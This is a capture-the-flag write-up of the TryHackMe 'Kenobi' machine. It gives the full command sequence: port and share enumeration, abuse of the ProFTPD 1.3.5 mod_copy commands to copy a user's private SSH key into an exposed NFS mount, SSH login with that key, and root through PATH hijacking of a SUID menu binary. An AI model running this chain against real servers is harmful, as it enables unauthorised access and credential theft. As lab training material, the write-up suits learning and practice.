TryHackMe Writeup: Kenobi

PwnPalace
4 min readFeb 2, 2021

--

Upon starting the machine, I was presented with the following IP address:

10.10.180.160

First step was to start enumerating the machine via portscan

sudo nmap -sT -sU -sV -Pn 10.10.180.160

Once complete, we see the following results

From this scan, we can discern the following:

1. Server is running ProFTPD 1.3.5. Further investigation shows this has multiple vulnerabilities

2. Server is running a webserver

3. Server has SSH and SMB open

Saving the vulnerable FTP service for later, we will first enumerate the endpoints SMB service

nmap -p445 10.10.180.160 –script smb-enum-shares,smb-enum-users

The resulting scan shows us that not only do we have anonymous login, but we also have READ/WRITE

Now that we know anonymous login is enabled, lets connect to it and see what’s inside

smbclient //10.10.180.160/anonymous

Looks like an interesting file, log.txt is inside. Let’s download the file and take a look at it

smbget -R smb://10.10.180.160/anonymous

cat log.txt

While viewing the file, you’ll notice that an ssh key pair was generated for Kenobi. This may be useful later. Let’s take note of that

Earlier, we noted a few open ports. Port 111 being one of them. A quick Google search says that this is possibly an nfs port.

Having that small tidbit of info, lets enumerate it. First, lets check for some associated nmap scripts

cat /usr/share/nmap/scripts/script.db | grep nfs

Lets go ahead and run these scripts

nmap -p111 10.10.180.160 — script nfs-ls,nfs-showmount,nfs-statfs

Looks like we found ourselves a mount

Remember that RSA key we found earlier? We need to find a way to get that key so that we can ssh into the box. Luckily, we have READ/WRITE access to the /var mount. So why not just copy it there? But how will we do that? Well from earlier we noted that ProFTPD 1.3.5 service that is running on the machine. Is there something we can do with that? Well, let’s check Metasploit

msfconsole

search proftpd

Looks like we have a matching exploit

Let’s get more info on the one that matches our version number

info exploit/unix/ftp/proftpd_modcopy_exec

Interesting. Apparently, we can copy any file on the system with the SITE CPTO and CPFR commands with this ProFTPD version. Let’s connect to it with netcat, and use the indicated commands to copy the ssh key into the mount

nc 10.10.180.160 21

SITE CPFR /home/kenobi/.ssh/id_rsa

SITE CPTO /var/tmp/id_rsa

Looks like it worked.

Now we just need to mount the folder, copy the file locally, then go ahead and ssh into it

mkdir /mnt/Kenobi

mount 10.10.180.160:/var /mnt/kenobi

ls -la /mnt/Kenobi/tmp

Looks like a success. Now let’s copy the key locally and give it proper permissions. Once complete, lets use that key to ssh into the box

cp /mnt/Kenobi/tmp/id_rsa .

chmod 600 id_rsa

ssh -i id_rsa kenobi@10.10.180.160

Success! We’re in! But, we really, really, REALLY want root… so lets check and see if there’s anything we can leverage

find / -perm -u=s -type f 2>/dev/null

Most of this stuff is pretty standard. Except one… /usr/bin/menu? Whats that?

Looks like its used to check the status of the server. But how? Let’s try something….

strings /usr/bin/menu

Looks like it calls curl to check it. But its not using an exact path (i.e. /usr/bin/curl). So let’s do the math. /usr/bin/menu runs with root privs and doesn’t use absolute paths to call other functionality. So what if we copied bash into curl and exported it to PATH, then allowed the menu app to call it? I mean, the application isn’t looking for /usr/bin/curl…. Just curl. It doesn’t care where curls at…..

echo /bin/sh > curl

chmod 777 curl

export PATH=/home/kenobi:$PATH

So now what?

Holy cow, it worked! We have r00t! Now we can read the flag

--

--